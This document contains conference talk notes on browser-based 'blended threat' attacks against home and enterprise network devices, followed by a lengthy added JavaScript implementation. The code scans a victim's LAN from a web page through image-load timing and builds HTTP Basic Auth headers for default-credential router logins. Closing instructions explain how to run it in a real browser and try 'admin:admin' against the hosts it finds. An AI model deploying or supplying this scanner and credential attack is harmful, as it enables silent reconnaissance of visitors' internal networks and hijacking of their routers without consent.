=======================================
A Plan for Permanent Network Compromise
=======================================

:Date: 2012-07-28
:Speakers: Phil Purviance, Josh Brashars
:Slides: http://media.blackhat.com/bh-us-12/Briefings/Purviance/BH_US_12_Purviance_Blended_Threats_Slides.pdf

Browser-Based Attacks
=====================

Old Skool
---------

+ Exploit Windows
+ Exfiltrate data
+ Detected/removed by AV

Nu Skool
--------

+ aka "Blended threats"
+ Multiple vectors (e.g. a worm that arrives by email and leaves a back door for further infection)
+ Break free of the browser and into the network

Why Attack Network Devices?
===========================

+ Hard to detect with AV
+ Non-standard upgrade model (firmware is rarely patched)
+ Ignored by users as long as the service keeps running

Compromising Network Devices
============================

+ Rogue SOHO/wifi routers (!!)

  - More common than you think
  - Engineers and careless QA plugging them into the enterprise network
  - Default settings!!

+ Bridging into the enterprise via VPN from compromised home users (!!)
+ Worst case scenario:

  - Make the browser do as much as possible
  - Make the end-user do all the work

+ Proof-of-concept: one JavaScript program

  - Hijack ad networks, upload sites, online surveys
  - Social network sites
  - Exploiting non-technical friends/family with spam posts

Network Scanning w/ JS
======================

+ JSScan
+ JS-Recon
+ jslanscanner
+ Enumerate IP addresses/ports with dynamic element creation (e.g. an ``<img>`` whose ``src`` points at a LAN address)

  - The browser makes the request on the LAN on the page's behalf; whether (and how quickly) ``onload``/``onerror`` fires reveals if the host is reachable, even though same-origin policy hides the response body

+ WebSockets
+ Pwning SOHO/home routers with default credentials
+ HTTP Basic Authentication
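The image-element probe described under "Network Scanning w/ JS", as an added example written for these notes (it is not code from the talk, nor from JSScan, JS-Recon or jslanscanner). The page sets ``img.src`` to ``http://<ip>:<port>/``; the browser performs the request regardless of origin, and the script only observes whether ``onload``/``onerror`` fires before a timeout. The timer, clock and image factory are injected so the same logic runs against a real ``Image`` in a browser or against the constructed LAN map and virtual clock included below for offline testing. The sample addresses, the 40 ms / 3 ms response delays and the 500 ms timeout are assumptions for the simulation, not measurements; ``basicAuthHeader`` builds the header a follow-up default-credential attempt against a router's Basic Auth realm would send.

```javascript
// Added example (not the talk's code): timing-based LAN host discovery from
// the browser. Same-origin policy stops us reading the response, not from
// observing whether one arrived. LAN map and virtual clock are constructed.

// 'load' = URL served a real image, 'error' = something answered but it was
// not an image (HTML login page, 404, TCP RST), 'timeout' = no answer.
function classify(event) {
  return event === 'timeout' ? 'silent' : 'answered';
}

// Probe one host:port. opts = { timeoutMs, makeLoader, now, setTimer, clearTimer }.
function probeHost(ip, port, opts, cb) {
  const { timeoutMs, makeLoader, now, setTimer, clearTimer } = opts;
  const start = now();
  let timer = null;
  let done = false;
  const finish = (event) => {
    if (done) return;
    done = true;
    if (timer !== null) clearTimer(timer);
    const elapsed = now() - start;
    cb({ ip, port, event, elapsed, state: classify(event) });
  };
  timer = setTimer(() => finish('timeout'), timeoutMs);
  const img = makeLoader();
  img.onload = () => finish('load');
  img.onerror = () => finish('error');
  img.src = `http://${ip}:${port}/`; // assigning src triggers the request
}

// Probe prefix+first .. prefix+last in parallel; cb gets results sorted by host.
function scanRange(prefix, first, last, port, opts, cb) {
  const results = [];
  const lastOctet = (ip) => parseInt(ip.split('.').pop(), 10);
  let pending = last - first + 1;
  for (let i = first; i <= last; i++) {
    probeHost(`${prefix}${i}`, port, opts, (r) => {
      results.push(r);
      if (--pending === 0) cb(results.sort((a, b) => lastOctet(a.ip) - lastOctet(b.ip)));
    });
  }
}

function liveHosts(results) {
  return results.filter((r) => r.state === 'answered').map((r) => r.ip);
}

// Header for a default-credential attempt against an HTTP Basic Auth realm.
// btoa is global in browsers and in Node >= 16.
function basicAuthHeader(user, pass) {
  return 'Basic ' + btoa(`${user}:${pass}`);
}

// Real-browser wiring: a genuine Image element and the wall clock.
function browserOpts(timeoutMs) {
  return {
    timeoutMs,
    makeLoader: () => new Image(),
    now: () => performance.now(),
    setTimer: (fn, ms) => setTimeout(fn, ms),
    clearTimer: (id) => clearTimeout(id),
  };
}

// --- Offline harness (constructed): deterministic clock plus a fake LAN ---
function virtualClock() {
  let t = 0;
  let nextId = 1;
  const queue = [];
  return {
    now: () => t,
    setTimer: (fn, ms) => { const id = nextId++; queue.push({ at: t + ms, id, fn }); return id; },
    clearTimer: (id) => { const i = queue.findIndex((e) => e.id === id); if (i >= 0) queue.splice(i, 1); },
    run: () => {
      while (queue.length) {
        queue.sort((a, b) => a.at - b.at || a.id - b.id);
        const e = queue.shift();
        t = e.at;
        e.fn();
      }
    },
  };
}

// lan maps ip -> { port: 'open' | 'closed' }. Assumed behaviour: an open port
// returns HTML (onerror after 40 ms), a closed one sends RST (onerror after
// 3 ms), an unlisted host never answers so only the timeout fires.
function fakeImageFactory(lan, clock) {
  return () => {
    const img = { onload: null, onerror: null };
    Object.defineProperty(img, 'src', {
      set(url) {
        const u = new URL(url);
        const state = (lan[u.hostname] || {})[u.port || '80'];
        const delay = state === 'open' ? 40 : state === 'closed' ? 3 : null;
        if (delay !== null) clock.setTimer(() => img.onerror && img.onerror(), delay);
      },
    });
    return img;
  };
}

const SAMPLE_LAN = { '192.168.1.1': { 80: 'open' }, '192.168.1.5': { 80: 'closed' } }; // constructed

// Scan 192.168.1.1-6 on port 80 against the fake LAN and return all results.
function demoScan() {
  const clock = virtualClock();
  let results = null;
  const opts = { timeoutMs: 500, makeLoader: fakeImageFactory(SAMPLE_LAN, clock), ...clock };
  scanRange('192.168.1.', 1, 6, 80, opts, (r) => { results = r; });
  clock.run();
  return results;
}
```

In a browser, replace the fake options with ``browserOpts(1500)`` and call ``scanRange`` from the page; ``liveHosts`` then gives the addresses to try default credentials against, with ``basicAuthHeader('admin', 'admin')`` as the ``Authorization`` value. Real timings are noisier than the constants assumed here (JS-Recon bucketed them rather than using a single cutoff), and newer browsers are tightening page-to-LAN subresource requests, so treat the thresholds as tunable rather than fixed.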